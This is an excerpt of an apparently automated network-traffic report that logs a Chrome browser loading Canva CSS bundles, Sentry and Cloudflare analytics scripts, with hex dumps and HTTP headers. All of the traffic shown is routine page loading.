                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 60 45 78 70 65 63 74 65 64 20 4d 61 70 20 66 6f 72 20 6b 65 79 20 22 24 7b 6b 7d 22 2c 20 66 6f 75 6e 64 3a 20 24 7b 56 61 28 6c 29 7d 20 24 7b 54 61 28 66 29 7d 60 29 3b 0a 69 66 28 30 3d 3d 3d 6c 2e 73 69 7a 65 29 62 72 65 61 6b 3b 6b 3d 7b 7d 3b 66 6f 72 28 63 6f 6e 73 74 20 5b 71 2c 72 5d 6f 66 20 6c 29 7b 69 66 28 74 79 70 65 6f 66 20 71 21 3d 3d 67 2e 72 45 61 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 60 45 78 70 65 63 74 65 64 20 24 7b 67 2e 72 45 61 7d 20 6d 61 70 20 6b 65 79 2c 20 66 6f 75 6e 64 3a 20 24 7b 56 61 28 71 29 7d 20 24 7b 54 61 28 5b 2e 2e 2e 66 2c 70 5d 29 7d 60 29 3b 66 2e 70 75 73 68 28 60 24 7b 70 7d 5b 22 24 7b 71 7d 22 5d 60 29 3b 6c 3d 64 2e
                                                                                                                                                                                                                                                                    Data Ascii: ))throw new TypeError(`Expected Map for key "${k}", found: ${Va(l)} ${Ta(f)}`);if(0===l.size)break;k={};for(const [q,r]of l){if(typeof q!==g.rEa)throw new TypeError(`Expected ${g.rEa} map key, found: ${Va(q)} ${Ta([...f,p])}`);f.push(`${p}["${q}"]`);l=d.
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 79 70 65 3a 32 2c 6d 64 61 3a 72 61 61 28 67 2c 63 2e 4c 63 61 29 2c 77 64 62 3a 68 2c 74 70 62 3a 6c 2c 47 4f 62 3a 71 2c 76 64 62 3a 6b 2c 4a 77 62 3a 6d 2c 54 63 62 3a 75 2c 66 69 65 6c 64 73 3a 67 2c 4e 67 62 3a 70 2c 44 61 62 3a 7b 7d 2c 79 34 62 3a 6e 7d 7d 29 2c 65 3d 28 67 2c 68 29 3d 3e 0a 7b 63 6f 6e 73 74 20 7b 77 64 62 3a 6b 2c 74 70 62 3a 6c 7d 3d 64 28 29 2c 6d 3d 67 5b 6b 5d 2c 6e 3d 6c 2e 67 65 74 28 6d 29 3b 69 66 28 21 6e 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 60 55 6e 6b 6e 6f 77 6e 20 6f 6e 65 6f 66 20 64 65 73 65 72 69 61 6c 69 7a 65 64 20 63 61 73 65 3a 20 24 7b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6d 29 7d 20 24 7b 54 61 28 68 29 7d 60 29 3b 72 65 74 75 72 6e 20 6e 2e 48 37 28 67 2c 68 29 7d 2c 66 3d
                                                                                                                                                                                                                                                                    Data Ascii: ype:2,mda:raa(g,c.Lca),wdb:h,tpb:l,GOb:q,vdb:k,Jwb:m,Tcb:u,fields:g,Ngb:p,Dab:{},y4b:n}}),e=(g,h)=>{const {wdb:k,tpb:l}=d(),m=g[k],n=l.get(m);if(!n)throw new TypeError(`Unknown oneof deserialized case: ${JSON.stringify(m)} ${Ta(h)}`);return n.H7(g,h)},f=


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    28192.168.2.1249747104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1080OUTGET /chunk-batch/9791fb4bf6628247.ltr.css+5eb15c719412ac66.ltr.css+a1dc22ba8402ef3d.ltr.css+a0684b0780c739e9.vendor.ltr.css+ddcf8590ae7c901d.ltr.css+ca9cfd0af880d084.ltr.css+14a7f0159a2b69de.ltr.css+202e686830bf1e42.ltr.css+d8958d2938e6e8fe.ltr.css+bc2b400c76016a88.ltr.css+7fc1a90e4d75fcc9.ltr.css HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1141INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:34 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                                                                    Content-Length: 89879
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950ea0d3d8c48-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49974
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:20 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 12 Nov 2024 01:21:06 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 13 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: hAjBhI684KMXzvW9GbCxFLUaM0adnewZ4XUvtJg3L+q3Gw99TZ0DMlt3bAreLlbYkEIrXYACxXs=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: J9X3DWDHY4PW74SZ
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: qbKOZ_BRQsOrB.3YWqin.2fLRQtGybyJ
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC362INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 4d 4e 72 25 32 42 4c 79 48 6d 51 42 75 37 6e 74 4e 61 62 30 41 35 7a 58 44 59 57 57 44 73 62 36 36 79 53 66 65 6f 4b 48 65 4d 41 75 78 7a 54 4f 54 59 4c 45 32 43 4e 42 75 66 49 78 37 4d 37 76 62 6d 25 32 42 65 36 7a 77 52 66 57 31 41 33 35 31 38 58 34 34 70 35 61 66 76 34 37 6d 4f 78 33 43 75 76 25 32 46 62 5a 31 76 59 6d 39 6e 6f 38 71 6b 48 54 66 78 44 51 7a 62 50 67 77 62 50 53 45 68 72 37 36 65 56 74 56 6c 41 35 47 6a 6e 39 71 67 36 6c 73 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MNr%2BLyHmQBu7ntNab0A5zXDYWWDsb66ySfeoKHeMAuxzTOTYLE2CNBufIx7M7vbm%2Be6zwRfW1A3518X44p5afv47mOx3Cuv%2FbZ1vYm9no8qkHTfxDQzbPgwbPSEhr76eVtVlA5Gjn9qg6ls%3D"}],"group":"cf-nel","max
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1235INData Raw: 2f 2a 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 39 37 39 31 66 62 34 62 66 36 36 32 38 32 34 37 2e 6c 74 72 2e 63 73 73 20 2a 2f 0a 2e 4a 33 45 48 46 51 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 69 73 6f 6c 61 74 69 6f 6e 3a 69 73 6f 6c 61 74 65 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 65 50 42 59 43 77 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 47 69 66 45 34 51 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 68 65 69 67 68 74 3a 2d 77 65 62 6b 69 74 2d 66 69 74 2d 63 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                    Data Ascii: /* __FILE_CONTENT_FOR__:9791fb4bf6628247.ltr.css */.J3EHFQ{box-sizing:border-box;display:flex;height:100%;isolation:isolate;position:relative;width:100%}.ePBYCw{flex-direction:column}.GifE4Q{align-items:center;flex-direction:row;height:-webkit-fit-conten
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 32 70 78 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 35 70 78 7d 2e 6c 50 61 34 43 51 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6c 50 61 34 43 51 2e 4c 76 64 52 6b 67 2e 4e 52 64 76 55 41 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 7d 2e 4a 33 45 48 46 51 2e 5f 31 77 72 73 79 41 2e 4e 52 64 76 55 41 3a 62 65 66 6f 72 65 2c 2e 6c 50 61 34 43 51 2e 5f 31 77 72 73 79 41 2e 4e 52 64 76 55 41 2c 2e 72 61 65 66 4d 77 3a 68 6f 76 65 72 20 2e 6c 50 61 34 43 51 2e 4e 52 64 76 55 41 2e 4f 51 71 41 64 41 2c 2e 72 61 65 66 4d 77 3a 68 6f 76 65 72 2e 4a 33 45 48 46 51 2e 4e 52 64 76 55 41 2e 4f 51 71 41 64 41 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72
                                                                                                                                                                                                                                                                    Data Ascii: {border-radius:12px;outline-offset:-5px}.lPa4CQ{height:100%;width:100%}.lPa4CQ.LvdRkg.NRdvUA:after{border-radius:10px}.J3EHFQ._1wrsyA.NRdvUA:before,.lPa4CQ._1wrsyA.NRdvUA,.raefMw:hover .lPa4CQ.NRdvUA.OQqAdA,.raefMw:hover.J3EHFQ.NRdvUA.OQqAdA:before{border
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 2e 58 32 78 74 42 41 2c 2e 77 4b 69 69 4c 77 2e 43 52 53 6c 6c 67 2e 51 32 4b 33 4f 67 2c 2e 77 4b 69 69 4c 77 2e 43 52 53 6c 6c 67 2e 6f 33 71 4d 69 51 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 5f 33 41 55 6c 38 41 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 2e 5f 4d 56 51 41 77 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 70 78 7d 2e 72 54 6e 69 4a 67 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 70 78 7d 2e 69 44 78 72 68 67 7b 62 6f 72 64 65 72 2d 62 6f 74 74
                                                                                                                                                                                                                                                                    Data Ascii: .X2xtBA,.wKiiLw.CRSllg.Q2K3Og,.wKiiLw.CRSllg.o3qMiQ{transition:background-color .15s ease-in-out}._3AUl8A{display:flex}._MVQAw{border-bottom-left-radius:0;border-top-left-radius:0;margin-left:1px}.rTniJg{border-radius:0;margin-left:1px}.iDxrhg{border-bott
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 34 67 7b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 6e 74 61 69 6e 7d 2e 5f 32 67 6b 5f 5f 77 7b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 76 65 72 7d 2e 71 5f 34 52 42 77 7b 6f 70 61 63 69 74 79 3a 30 7d 40 73 75 70 70 6f 72 74 73 20 28 2d 77 65 62 6b 69 74 2d 74 6f 75 63 68 2d 63 61 6c 6c 6f 75 74 3a 6e 6f 6e 65 29 7b 2e 6d 35 5f 6c 59 67 7b 2d 77 65 62 6b 69 74 2d 74 6f 75 63 68 2d 63 61 6c 6c 6f 75 74 3a 6e 6f 6e 65 7d 7d 2e 5f 38 6d 57 47 61 67 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 5f 31 59 4e 42 7a 77 2c 2e 76 57 37 72 71 51 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67
                                                                                                                                                                                                                                                                    Data Ascii: 4g{object-fit:contain}._2gk__w{object-fit:cover}.q_4RBw{opacity:0}@supports (-webkit-touch-callout:none){.m5_lYg{-webkit-touch-callout:none}}._8mWGag{display:flex;height:100%;overflow:hidden;position:relative;width:100%}._1YNBzw,.vW7rqQ{display:block;heig
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 70 78 7d 2e 4a 77 48 36 41 41 7b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 51 4a 70 52 48 77 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 31 70 78 20 76 61 72 28 2d 2d 4f 75 43 6b 43 51 29 7d 0a 2f 2a 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 61 31 64 63 32 32 62 61 38 34 30 32 65 66 33 64 2e 6c 74 72 2e 63 73 73 20 2a 2f 0a 2e 72 61 33 6e 6e 77 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 72 61 33 6e 6e 77 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 4b 74 58 6c 52 67 29 3b 62 6f 72 64
                                                                                                                                                                                                                                                                    Data Ascii: px}.JwH6AA{border:2px solid transparent}.QJpRHw{box-shadow:inset 0 0 0 1px var(--OuCkCQ)}/* __FILE_CONTENT_FOR__:a1dc22ba8402ef3d.ltr.css */.ra3nnw{display:block;height:auto;position:relative;width:auto}.ra3nnw:before{background-color:var(--KtXlRg);bord
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 4e 6b 37 38 6f 67 20 2e 5f 37 51 69 44 4a 67 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 4f 36 48 75 6d 67 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 2c 3a 61 63 74 69 76 65 2c 2e 45 5f 5a 57 34 67 29 3a 68 6f 76 65 72 20 2e 72 61 33 6e 6e 77 2e 5f 4d 48 72 67 51 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 51 41 44 4f 44 77 29 7d 2e 72 61 33 6e 6e 77 2e 4e 6b 37 38 6f 67 3a 68 6f 76 65 72 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 72 61 33 6e 6e 77 2e 4e 6b 37 38 6f 67 3a 68 6f 76 65 72 20 2e 5f 37 51 69 44 4a 67 7b 6f 70 61 63 69 74 79 3a 30 7d 2e 4f 36 48 75 6d 67 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 2c 3a 61 63 74 69 76 65 2c 2e 45 5f 5a
                                                                                                                                                                                                                                                                    Data Ascii: Nk78og ._7QiDJg{opacity:0}.O6Humg:not(:disabled,:active,.E_ZW4g):hover .ra3nnw._MHrgQ:before{background-color:var(--QADODw)}.ra3nnw.Nk78og:hover:before{background-color:transparent}.ra3nnw.Nk78og:hover ._7QiDJg{opacity:0}.O6Humg:not(:disabled,:active,.E_Z
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 7a 37 58 71 37 41 29 7d 0a 2f 2a 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 61 30 36 38 34 62 30 37 38 30 63 37 33 39 65 39 2e 76 65 6e 64 6f 72 2e 6c 74 72 2e 63 73 73 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 51 75 69 6c 6c 20 45 64 69 74 6f 72 20 76 32 2e 30 2e 30 2d 64 65 76 2e 34 36 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 71 75 69 6c 6c 6a 73 2e 63 6f 6d 2f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 34 2c 20 4a 61 73 6f 6e 20 43 68 65 6e 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 33 2c 20 73 61 6c 65 73 66 6f 72 63 65 2e 63 6f 6d 0a 20 2a 2f 2e 71 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f
                                                                                                                                                                                                                                                                    Data Ascii: kground-color:var(--z7Xq7A)}/* __FILE_CONTENT_FOR__:a0684b0780c739e9.vendor.ltr.css *//*! * Quill Editor v2.0.0-dev.46 * https://quilljs.com/ * Copyright (c) 2014, Jason Chen * Copyright (c) 2013, salesforce.com */.ql-container{box-sizing:border-bo
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 3a 6e 6f 6e 65 29 7b 2e 71 6c 2d 65 64 69 74 6f 72 20 68 31 2c 2e 71 6c 2d 65 64 69 74 6f 72 20 68 32 2c 2e 71 6c 2d 65 64 69 74 6f 72 20 68 33 2c 2e 71 6c 2d 65 64 69 74 6f 72 20 68 34 2c 2e 71 6c 2d 65 64 69 74 6f 72 20 68 35 2c 2e 71 6c 2d 65 64 69 74 6f 72 20 68 36 2c 2e 71 6c 2d 65 64 69 74 6f 72 20 70 7b 63 6f 75 6e 74 65 72 2d 72 65 73 65 74 3a 6c 69 73 74 2d 30 20 6c 69 73 74 2d 31 20 6c 69 73 74 2d 32 20 6c 69 73 74 2d 33 20 6c 69 73 74 2d 34 20 6c 69 73 74 2d 35 20 6c 69 73 74 2d 36 20 6c 69 73 74 2d 37 20 6c 69 73 74 2d 38 20 6c 69 73 74 2d 39 7d 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 74 61 62 6c 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 74 64 7b 62 6f 72 64 65 72 3a 31 70 78
                                                                                                                                                                                                                                                                    Data Ascii: :none){.ql-editor h1,.ql-editor h2,.ql-editor h3,.ql-editor h4,.ql-editor h5,.ql-editor h6,.ql-editor p{counter-reset:list-0 list-1 list-2 list-3 list-4 list-5 list-6 list-7 list-8 list-9}}.ql-editor table{border-collapse:collapse}.ql-editor td{border:1px
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC1369INData Raw: 2d 69 6e 64 65 6e 74 2d 31 7b 63 6f 75 6e 74 65 72 2d 69 6e 63 72 65 6d 65 6e 74 3a 6c 69 73 74 2d 31 7d 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 5b 64 61 74 61 2d 6c 69 73 74 3d 6f 72 64 65 72 65 64 5d 2e 71 6c 2d 69 6e 64 65 6e 74 2d 31 3e 2e 71 6c 2d 75 69 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 63 6f 75 6e 74 65 72 28 6c 69 73 74 2d 31 2c 6c 6f 77 65 72 2d 61 6c 70 68 61 29 20 22 2e 20 22 7d 40 73 75 70 70 6f 72 74 73 20 28 63 6f 75 6e 74 65 72 2d 73 65 74 3a 6e 6f 6e 65 29 7b 2e 71 6c 2d 65 64 69 74 6f 72 20 6c 69 5b 64 61 74 61 2d 6c 69 73 74 5d 2e 71 6c 2d 69 6e 64 65 6e 74 2d 31 7b 63 6f 75 6e 74 65 72 2d 73 65 74 3a 6c 69 73 74 2d 32 20 6c 69 73 74 2d 33 20 6c 69 73 74 2d 34 20 6c 69 73 74 2d 35 20 6c 69 73 74 2d 36 20 6c 69 73 74 2d 37 20
                                                                                                                                                                                                                                                                    Data Ascii: -indent-1{counter-increment:list-1}.ql-editor li[data-list=ordered].ql-indent-1>.ql-ui:before{content:counter(list-1,lower-alpha) ". "}@supports (counter-set:none){.ql-editor li[data-list].ql-indent-1{counter-set:list-2 list-3 list-4 list-5 list-6 list-7


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    29192.168.2.124974834.120.195.249443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC478OUTGET /api/1767683/envelope/?sentry_key=944d224d45b943ba9f96396432dfd868&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.16.0 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: o13855.ingest.sentry.io
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC518INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:34 GMT
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                    access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                    allow: POST
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    30192.168.2.1249749104.16.79.73443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:34 UTC413OUTGET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.cloudflareinsights.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC373INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:35 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                    Content-Length: 19948
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                    ETag: W/"2024.6.1"
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 06 Jun 2024 15:52:56 GMT
                                                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8e5950ee7ae442af-EWR
                                                                                                                                                                                                                                                                    2024-11-20 15:01:35 UTC996INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 33 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 32 35 36 3b 2b 2b 6e 29 74 5b 6e 5d 3d 28 6e 2b 32 35 36 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 28 31 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 72 3d 6e 7c 7c 30 2c 69 3d 74 3b 72 65 74 75 72 6e 5b 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 69 5b 65 5b 72 2b 2b 5d 5d 2c 22 2d 22 2c 69 5b 65 5b 72 2b
